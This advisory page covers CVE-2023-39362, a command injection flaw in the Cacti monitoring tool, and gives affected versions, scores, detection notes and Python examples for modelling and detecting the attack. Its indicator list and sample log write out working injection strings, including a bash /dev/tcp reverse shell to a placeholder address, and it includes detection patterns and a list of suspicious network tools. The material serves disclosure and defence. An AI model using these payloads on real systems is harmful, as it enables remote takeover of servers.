CVE-2023-39362
published 2023-09-05

Priority: P2 (70), High
CVSS 3.1: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Exploit: yes (see Detection & IOCs below)
EPSS: 82.19% (99.6th percentile)
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user can place a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept some variables as input and place them into an `exec` call without proper escaping or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
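As an added illustration (not Cacti's code and not taken from the page's sources), the Python below models the two halves of that description: the concatenated command line an unescaped `exec()` wrapper hands to the shell, and the same command built with per-argument quoting, with `shlex.quote` standing in for PHP's `escapeshellarg()`. The device address and OID are constructed values; the community string is the one listed in the IOCs further down. Tokenizing the result the way a POSIX shell would shows why the injected value becomes three commands in one case and a single harmless argument in the other.

```python
"""Model of the CVE-2023-39362 pattern: an SNMP command line assembled by
string concatenation (how an unescaped exec() wrapper behaves) beside one
assembled with per-argument quoting.

Added illustration in Python, not Cacti's lib/snmp.php. shlex.quote plays
the role PHP's escapeshellarg() plays; HOST and OID are constructed values.
"""
import shlex

HOST = "192.0.2.10"            # constructed sample device address
OID = ".1.3.6.1.2.1.1.1.0"     # sysDescr.0

# The community string from the page's IOCs: the first quote closes the
# single-quoted argument, ';' starts a new command, and the trailing quote
# re-opens a string so the shell still sees balanced quotes and runs it.
INJECTED_COMMUNITY = "public' ; touch /tmp/m3ssap0 ; '"


def build_unescaped(community, host=HOST, oid=OID):
    """Vulnerable pattern: the caller-controlled value is pasted between
    single quotes and the whole string is handed to /bin/sh."""
    return "snmpget -v2c -c '" + community + "' " + host + " " + oid


def build_escaped(community, host=HOST, oid=OID):
    """Hardened pattern: every untrusted argument is quoted on its own, so
    quotes and separators inside it stay part of that one argument."""
    return "snmpget -v2c -c %s %s %s" % (
        shlex.quote(community), shlex.quote(host), shlex.quote(oid))


def shell_commands(cmdline):
    """Tokenize like a POSIX shell and split on ';' separators, returning
    the list of argv-style commands the shell would actually execute."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    commands.append(current)
    return commands


def injection_succeeds(community, builder=build_unescaped):
    """True when the community string turns one snmpget into several
    commands, i.e. when the shell would run attacker-supplied code."""
    return len(shell_commands(builder(community))) > 1


if __name__ == "__main__":
    for builder in (build_unescaped, build_escaped):
        cmdline = builder(INJECTED_COMMUNITY)
        print(builder.__name__, "->", cmdline)
        for argv in shell_commands(cmdline):
            print("   runs:", argv)
```

Run it and the unescaped form prints three separate commands, the middle one being `['touch', '/tmp/m3ssap0']`; the escaped form prints one command whose `-c` argument is the complete, now inert, community string.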

Affected

8 ranges

Vendor         Product  Version range                        Fixed in
cacti          cacti    < 1.2.25                             1.2.25
cacti          cacti    >= 0, < 1.2.16+ds1-2+deb11u2         1.2.16+ds1-2+deb11u2
cacti          cacti    >= 0, < 1.2.24+ds1-1+deb12u1         1.2.24+ds1-1+deb12u1
cacti          cacti    >= 0, < 1.2.25+ds1-1                 1.2.25+ds1-1
cacti          cacti    >= 0, < 1.2.25+ds1-1                 1.2.25+ds1-1
debian         cacti    < 1.2.24+ds1-1+deb12u1 (bookworm)    1.2.24+ds1-1+deb12u1 (bookworm)
fedoraproject  fedora   (no version range given)             (not given)
fedoraproject  fedora   (no version range given)             (not given)

Detection & IOCs (extracted from sources)

Indicators:
  path:    lib/snmp.php
  command: public' ; touch /tmp/m3ssap0 ; '
  command: public' ; bash -c "exec bash -i &>/dev/tcp// <&1" ; '
  path:    /tmp/m3ssap0

Detection and exploitation notes:
  • Monitor SNMP Community String fields in Cacti Device configuration for shell metacharacters, particularly single-quote escapes and semicolons (e.g., patterns matching `\'\s*;` or `;\'`) indicative of command injection attempts.
  • Alert on Cacti poller or web process spawning unexpected child processes (e.g., bash, touch, nc) as a result of exec() calls originating from lib/snmp.php.
  • Detect reverse shell attempts via /dev/tcp from Cacti server processes, consistent with the bash reverse shell payload used in exploitation of this CVE.
  • Exploitation can also occur via the Cacti poller on existing devices; monitor for unexpected file creation under /tmp by the Cacti poller process.
  • Exploitation requires the attacker to be authenticated with privileges to manage Devices and/or Graphs (e.g., 'Sites/Devices/Data', 'Graphs'); unauthenticated users cannot trigger this vulnerability.
  • The vulnerability is only exploitable when the PHP snmp module is NOT installed; if the PHP snmp module is present, the vulnerable exec() code path in lib/snmp.php is not reached.
  • A Device that supports SNMP (version 1 or 2) and has Net-SNMP Graph templates must be available; without these conditions the injection payload is not triggered.
  • When exploiting via an existing device through the poller, it may be necessary to change the 'Downed Device Detection' field to a non-SNMP method, as the malicious payload could break SNMP interaction with the host.
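The detection bullets above, turned into runnable logic as an added example (not from the page's sources): one rule for the community-string pattern in Device configuration, one for unexpected children of the Cacti web or poller process, one for `/dev/tcp` reverse shells, and one for file creation under `/tmp` by that process tree. The telemetry format is an assumption, JSON lines carrying a list of ancestor process names, and so are the process names assumed for Cacti (apache2/httpd, php-fpm, php); the sample events, including the 192.0.2.99:4444 callback address, are constructed for the demonstration.

```python
"""Detection logic for the CVE-2023-39362 indicators listed above, run over
constructed sample telemetry.

Added example, not from the page's sources. Assumptions not stated on the
page: telemetry arrives as JSON lines with a per-event ancestry list of
process names, and Cacti's web UI and poller appear in that list as
apache2/httpd, php-fpm or php.
"""
import json
import re

CACTI_PARENTS = {"php", "php-fpm", "apache2", "httpd"}   # assumption
# Children an SNMP helper chain (sh -c snmpget ...) has no reason to spawn.
SUSPICIOUS_CHILDREN = {"bash", "touch", "nc", "ncat", "curl", "wget",
                       "perl", "python3"}

# Single-quote breakout next to a command separator, as in the page's IOCs.
QUOTE_BREAKOUT = re.compile(r"'\s*;|;\s*'")
# Other shell metacharacters that never belong in an SNMP community string.
SHELL_META = re.compile(r"[;|&`$()<>]")
DEV_TCP = re.compile(r"/dev/tcp/")


def community_is_suspicious(value):
    """Flag a Device SNMP community string that carries shell syntax."""
    return bool(QUOTE_BREAKOUT.search(value) or SHELL_META.search(value))


def analyze_event(ev):
    """Return a list of (rule, detail) alerts for one telemetry event."""
    alerts = []
    from_cacti = bool(set(ev.get("ancestry", [])) & CACTI_PARENTS)
    kind = ev.get("type")
    if kind == "config" and ev.get("field") == "snmp_community":
        if community_is_suspicious(ev.get("value", "")):
            alerts.append(("community_injection", ev["value"]))
    elif kind == "process" and from_cacti:
        comm = ev.get("comm", "")
        if comm in SUSPICIOUS_CHILDREN:
            alerts.append(("unexpected_child", comm))
        if DEV_TCP.search(ev.get("cmdline", "")):
            alerts.append(("reverse_shell", ev["cmdline"]))
    elif kind == "file" and from_cacti:
        if ev.get("op") == "create" and ev.get("path", "").startswith("/tmp/"):
            alerts.append(("tmp_file_create", ev["path"]))
    return alerts


def scan(lines):
    """Run every rule over an iterable of JSON-line events."""
    alerts = []
    for line in lines:
        line = line.strip()
        if line:
            alerts.extend(analyze_event(json.loads(line)))
    return alerts


# Constructed sample telemetry: a benign poll, an injected community string,
# the resulting touch and file creation, a web-triggered reverse shell, and
# an unrelated interactive bash under sshd that must not alert.
SAMPLE_LOG = r"""
{"type": "config", "field": "snmp_community", "value": "public"}
{"type": "config", "field": "snmp_community", "value": "public' ; touch /tmp/m3ssap0 ; '"}
{"type": "process", "comm": "snmpget", "ancestry": ["cron", "php", "sh"], "cmdline": "snmpget -v2c -c public 192.0.2.10 .1.3.6.1.2.1.1.1.0"}
{"type": "process", "comm": "touch", "ancestry": ["cron", "php", "sh"], "cmdline": "touch /tmp/m3ssap0"}
{"type": "file", "op": "create", "path": "/tmp/m3ssap0", "ancestry": ["cron", "php", "sh", "touch"]}
{"type": "process", "comm": "bash", "ancestry": ["apache2", "php-fpm", "sh"], "cmdline": "bash -c exec bash -i &>/dev/tcp/192.0.2.99/4444 <&1"}
{"type": "process", "comm": "bash", "ancestry": ["sshd", "bash"], "cmdline": "bash -i"}
"""

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_LOG.splitlines()):
        print("%-20s %s" % (rule, detail))
```

The benign `snmpget` child of the poller produces no alert, which matters in practice: `lib/snmp.php` legitimately spawns the Net-SNMP binaries through `sh -c`, so the rule keys on what that shell goes on to spawn rather than on the spawn itself. Tune `CACTI_PARENTS` to the process names your deployment actually uses.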

CVSS provenance

nvd            v3.1  7.2  HIGH  CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
osv                  7.2  HIGH
vendor_debian        7.2  HIGH